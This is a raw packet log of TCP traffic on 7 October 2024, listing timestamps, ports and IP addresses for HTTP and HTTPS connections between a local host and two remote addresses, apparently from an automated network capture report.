Oct 7, 2024 03:15:37.184611082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184627056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184643984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184649944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184649944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184660912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184679985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184683084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184699059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.184703112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184735060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.184766054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.203752995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.203790903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.203825951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.203829050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.203859091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.203860998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.203881025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.203893900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.203917980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.203927040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.203955889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.203963041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.203979969 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.204024076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.205452919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.205486059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.205528975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.205549955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.205554962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.205599070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.205640078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.205661058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.205663919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.205682039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.205698967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.205703974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.205729008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.205765009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.252541065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252595901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252641916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.252646923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252680063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252684116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.252707005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.252715111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252734900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.252747059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252764940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.252780914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252794027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.252813101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252830982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252863884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252866983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.252899885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252928019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.252933025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252949953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.252966881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.252990007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.253015995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.253067970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.271720886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.271774054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.271809101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.271841049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.271876097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.271913052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.271950960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.271980047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.272008896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272008896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272008896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272044897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272044897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272486925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.272536993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.272556067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272588968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.272599936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272641897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.272650003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272701025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.272706032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272754908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.272759914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272809982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.272813082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272867918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.272872925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272919893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.272926092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272953033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.272981882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.272985935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273014069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273019075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273042917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273075104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273085117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273129940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273138046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273180962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273190022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273212910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273241043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273246050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273269892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273281097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273303986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273313999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273344994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273345947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273370028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273380041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273408890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273411989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273432016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273441076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273471117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273475885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273499966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273509026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273544073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273545980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273566961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273596048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273605108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273710966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273725033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273761988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273772955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273794889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273823977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273824930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273861885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273880005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273881912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273937941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.273941040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.273967028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274002075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274019957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274020910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274051905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274079084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274082899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274117947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274132967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274138927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274167061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274190903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274199009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274223089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274230957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274261951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274264097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274286032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274296999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274322033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274332047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274358988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274360895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274393082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274394035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274414062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274426937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274455070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274458885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274485111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274493933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274518967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274532080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274565935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274599075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274600983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274631977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274640083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274663925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274679899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274698019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274701118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274718046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274728060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274744034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274759054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274776936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274776936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274792910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274811029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274816990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274828911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274838924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274849892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274861097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274868011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.274902105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.274933100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275266886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275283098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275300980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275327921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275338888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275342941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275369883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275373936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275399923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275412083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275428057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275439978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275455952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275465965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275475979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275482893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275497913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275525093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275527954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275541067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275559902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275568008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275583029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275599957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275599957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275624037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275639057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275640011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275655031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275656939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275671005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275691032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275705099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275707960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275724888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.275748014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.275768995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.294590950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.294606924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.294632912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.294650078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.294665098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.294682980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.294698954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.294714928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.294903040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.294903040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.294903040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.294903040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.296509027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.296535969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.296564102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.296587944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.296603918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.296606064 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.296618938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.296627998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.296636105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.296681881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.296711922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.312650919 CEST	443	49817	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.312755108 CEST	443	49817	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.312850952 CEST	443	49817	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.312947035 CEST	49817	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.313085079 CEST	49817	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.313110113 CEST	443	49817	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.313126087 CEST	49817	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.313133955 CEST	443	49817	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.316354990 CEST	49822	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.316407919 CEST	443	49822	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.316504002 CEST	49822	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.316704035 CEST	49822	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.316725016 CEST	443	49822	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.343569040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343672037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343688011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343703985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343730927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343745947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343750954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.343760967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343786955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343801975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343807936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.343818903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343833923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343833923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.343849897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343857050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.343864918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343880892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.343898058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.343934059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.362745047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.362803936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.362869024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.362874985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.362909079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.362927914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.362942934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.362962961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.362976074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.362992048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.363008976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363027096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.363042116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363059044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.363086939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.363610983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363636971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363652945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363670111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.363699913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.363795042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363810062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363826990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363841057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363856077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.363867044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363879919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.363882065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363898993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363913059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363918066 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.363928080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363944054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363957882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.363970995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.363979101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.363997936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364015102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.364015102 CEST	49782	80	192.168.2.5	95.164.90.97
